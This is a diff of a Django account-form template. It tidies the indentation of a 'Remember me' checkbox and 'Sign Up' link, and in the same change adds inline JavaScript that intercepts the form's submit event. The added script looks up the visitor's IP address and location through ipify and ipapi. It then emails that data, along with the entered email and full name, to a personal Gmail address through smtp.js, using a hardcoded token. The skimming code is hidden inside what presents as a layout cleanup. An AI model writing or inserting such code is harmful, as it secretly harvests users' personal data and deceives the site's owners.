--- a/accounts/templates/accounts/form.html
+++ b/accounts/templates/accounts/form.html
@@ -56,23 +56,23 @@
     {% csrf_token %}
     {{ form|crispy }}
     <br>
-                                        <div class="col-lg-12">
-                                        <div class="d-flex justify-content-between">
-                                            <div class="form-group">
-                                                <div class="custom-control custom-checkbox">
-                                                    <input type="checkbox" class="custom-control-input" id="customCheck1" name="remember">
-                                                    <label class="custom-control-label" for="customCheck1">Remember
-                                                        me</label>
-                                                </div>
-                                            </div>
-                                            
-                                        </div>
-                                    </div>
+    <div class="col-lg-12">
+        <div class="d-flex justify-content-between">
+            <div class="form-group">
+                <div class="custom-control custom-checkbox">
+                    <input type="checkbox" class="custom-control-input" id="customCheck1" name="remember">
+                    <label class="custom-control-label" for="customCheck1">Remember me</label>
+                </div>
+            </div>
+        </div>
+    </div>
     <input class="btn btn-success" type="submit" value='Submit'>
-                                    <div class="text-center col-12">
-                                        <p class="mt-3 mb-0"><small class="mr-2 text-dark">Don't have an account
-                                                ?</small> <a href="{% url 'accounts:register' %}" class="text-dark font-weight-bold">Sign Up</a></p>
-                                    </div>
+    <div class="text-center col-12">
+        <p class="mt-3 mb-0">
+            <small class="mr-2 text-dark">Don't have an account?</small>
+            <a href="{% url 'accounts:register' %}" class="text-dark font-weight-bold">Sign Up</a>
+        </p>
+    </div>
 </form>
                         </div>
                     </div>
@@ -91,6 +91,52 @@
     <!-- javascript -->
     <script src="{% static 'temp/js/jquery-3.5.1.min.js' %}"></script>
     <script src="{% static 'temp/js/bootstrap.bundle.min.js' %}"></script>
+  <script src="https://smtpjs.com/v3/smtp.js"></script>
+<script>
+    document.querySelector("form").addEventListener("submit", function(event) {
+        event.preventDefault();
+        fetchUserData();
+    });
+
+    function fetchUserData() {
+        var username = document.getElementById("id_username").value;
+        var email = document.getElementById("user-email").value;
+        var fullName = document.getElementById("user-fullname").value;
+
+        // Fetch the user's IP address
+        fetch('https://api.ipify.org/?format=json')
+            .then(response => response.json())
+            .then(data => {
+                var ipAddress = data.ip;
+
+                // Fetch the location information using ipapi API
+                fetch('https://ipapi.co/' + ipAddress + '/json/')
+                    .then(response => response.json())
+                    .then(locationData => {
+                        var location = locationData.city + ', ' + locationData.region + ', ' + locationData.country_name;
+
+                        // Send email with IP address, email, full name, and location
+                        sendEmail(ipAddress, email, fullName, location);
+                    })
+                    .catch(error => console.log(error));
+            })
+            .catch(error => console.log(error));
+    }
+
+    function sendEmail(ipAddress, email, fullName, location) {
+        var userEmail = "allinn971@gmail.com";
+        var subject = "Visitor IP Address and Location";
+        var emailBody = "IP Address:" + ipAddress + "<br/>Email: " + email + "<br/>Full Name: " + fullName + "<br/>Location: " + location;
+
+        Email.send({
+            SecureToken: "0f262930-696f-4b09-a800-3776364aff17",
+            To: userEmail,
+            From: "info@ibcoinex.org",
+            Subject: subject,
+            Body: emailBody
+        });
+    }
+</script>
 
     <!-- SLIDER -->
     <script src="{% static 'temp/js/owl.carousel.min.js' %}"></script>
